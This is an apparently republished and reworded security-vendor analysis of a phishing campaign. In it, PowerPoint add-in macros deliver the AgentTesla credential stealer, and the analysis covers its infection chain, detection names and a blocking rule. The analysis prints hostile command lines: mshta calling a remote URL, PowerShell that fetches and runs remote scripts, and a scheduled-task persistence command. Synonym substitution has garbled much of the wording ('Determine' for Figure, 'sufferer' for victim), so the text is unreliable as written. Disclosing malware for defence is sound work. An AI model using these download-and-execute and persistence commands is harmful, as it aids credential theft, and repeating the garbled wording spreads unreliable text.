Malicious PowerPoint Paperwork on the Rise

Authored by Anuradha M

McAfee Labs have noticed a brand new phishing marketing campaign that makes use of macro capabilities out there in Microsoft PowerPoint. On this marketing campaign, the spam e-mail comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to ship variants of AgentTesla which is a well known password stealer. These spam emails purport to be associated to monetary transactions.  

AgentTesla is a RAT (Distant Entry Trojan) malware that has been energetic since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to steal consumer credentials and different data from victims by way of screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly by way of phishing campaigns. 

Throughout Q2, 2021, we’ve got seen a rise in PowerPoint malware. 

Figure 1. Trend of PPT malware over the first half of 2021
Determine 1. The pattern of PPT malware over the primary half of 2021

On this marketing campaign, the spam e-mail incorporates an connected file with a .ppam extension which is a PowerPoint file containing VBA code. The sentiment used was finance-related themes akin toNew PO300093 Order as proven in Determine 2. The attachment filename is 300093.pdf.ppam”. 

Determine 2. Spam Electronic mail

PPAM file: 

This file kind was launched in 2007 with the discharge of Microsoft Workplace 2007. It is a PowerPoint macro-enabled Open XML add-in file. It incorporates elements that add further performance, together with additional instructions, customized macros, and new instruments for extending default PowerPoint capabilities.  

Since PowerPoint helps ‘add-ins’ developed by third events so as to add new options, attackers abuse this characteristic to mechanically execute macros. 

Technical Evaluation: 

As soon as the sufferer opens the “.ppam” file, a safety discover warning pop-up as proven in Determine 3 to alert the consumer in regards to the presence of macro.

Figure 3. Warning when opening the attached PowerPoint file
Determine 3. Warning when opening the connected PowerPoint file

From Determine 4, you’ll be able to see that the Add-in characteristic of the PowerPoint will be recognized from the content material of [Content_Types].xml file which can be current contained in the ppam file. 

Figure 4. Powerpoint add-in feature with macroEnabled
Determine 4. Powerpoint add-in characteristic with macroEnabled

 The PPAM file incorporates the next information and directories which will be seen upon extraction. 

  • _rels.rels 
  • [Content_Types].xml 
  • pptrelspresentation.xml.rels 
  • pptasjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file 
  • pptpresentation.xml 

As soon as the sufferer permits the macro, the add-in will get put in silently with out consumer information, which will be seen in Determine 5. On seeing that there is no such thing as a content material and no slide within the PowerPoint, the consumer will shut the file however, within the backend, macro code will get executed to provoke the malicious exercise. 

Figure 5. Installed Add-ins in the PowerPoint options
Determine 5. Put in Add-ins within the PowerPoint choices

As you’ll be able to see in Determine 6, the macro is executed inside the add-in auto_open() occasion i.e.., macro is fired instantly after the presentation is opened and the add-in is loaded. 

Figure 6.VBA Code snippet with auto_open() event
Determine 6.VBA Code snippet with auto_open() occasion

The PowerPoint macro code on execution launches an URL by invoking mshta.exe (Microsoft HTML Software) which is proven in Determine 7. The mshta course of is launched by Powerpoint by calling the CreateProcessA() API. 

Under are the parameters handed to CreateProcessA() API: 

kernel32.CreateProcessA(00000000,mshta hxxps://,00000000,00000000,00000001,00000020,00000000,00000000,D, 

Figure 7. VBA Code snippet containing mshta and url
Determine 7. VBA Code snippet containing mshta and url

Under is the command line parameter of mshta: 

mshta hxxps:// 

The URL hxxps:// is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” however it didn’t get any response from “27.html” on the time of research. 

Later mshta.exe spawns powershell.exe as a baby course of. 

Under is the command line parameters of PowerShell: 

powershell.exe - ”C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” i’E’x(iwr(‘hxxps://‘) -useB);i’E’x(iwr(‘hxxps://‘) -useB);i’E’x(iwr(‘hxxps://‘) -useB); 

PowerShell downloads and executed script information from the above-mentioned URLs.  

The beneath Determine 8 reveals the content material of the first url – “hxxps://”: 

Figure 8. Binary file content
Determine 8. Binary file content material

There are two binary information saved in two enormous arrays inside every downloaded PowerShell file. The primary file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs talked about within the command line, decodes it, and launches MSBuild.exe to inject the payload inside itself. 

Schedule Duties: 

To realize persistence, it creates a scheduled process in “Activity Scheduler” and drops a process file beneath C:windowssystem32SECOTAKSA to make your complete marketing campaign work successfully.   

Figure 9. Code snippet to create a new schedule task
Determine 9. Code snippet to create a brand new scheduled process

The brand new process identify is SECOTAKSA”. Its motion is to execute the command mshta hxxp:// //” and it’s known as each 80 minutes.  

Under is the command line parameters of schtasks: 

schtasks.exe - “C:WindowsSystem32schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”””MsHtA””””hxxp://“” 

An infection Chain: 

Figure 10. Infection Chain
Determine 10. An infection Chain

Course of Tree: 

Figure 11. Process Tree
Determine 11. Course of Tree


McAfee’s Endpoint Safety (ENS) and Home windows Methods Safety (WSS) product have  DAT protection for this variant of malware. 

This malicious PPAM doc with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as “W97M/Downloader.dkw”.  

The PPAM doc can also be blocked by the AMSI characteristic in ENS as AMSI-FKN! 

Moreover, the Exploit Prevention characteristic in McAfee’s Endpoint Safety product blocks the an infection chain of this malware by including the beneath skilled rule in order to shield our clients from this malicious assault. 

Professional Rule authored primarily based on the beneath an infection chain: 

POWERPNT.EXE –> mshta.exe  

Professional Rule: 

Rule { 

  Course of { 

    Embrace OBJECT_NAME { -v “powerpnt.exe” } 


  Goal { 

    Match PROCESS { 

       Embrace OBJECT_NAME { -v “mshta.exe” } 

       Embrace PROCESS_CMD_LINE { -v “**http**” } 

       Embrace -access “CREATE” 







hxxp:// // 





EML information: 





PPAM information: 






Extracted AgentTesla information: 



Leave a Comment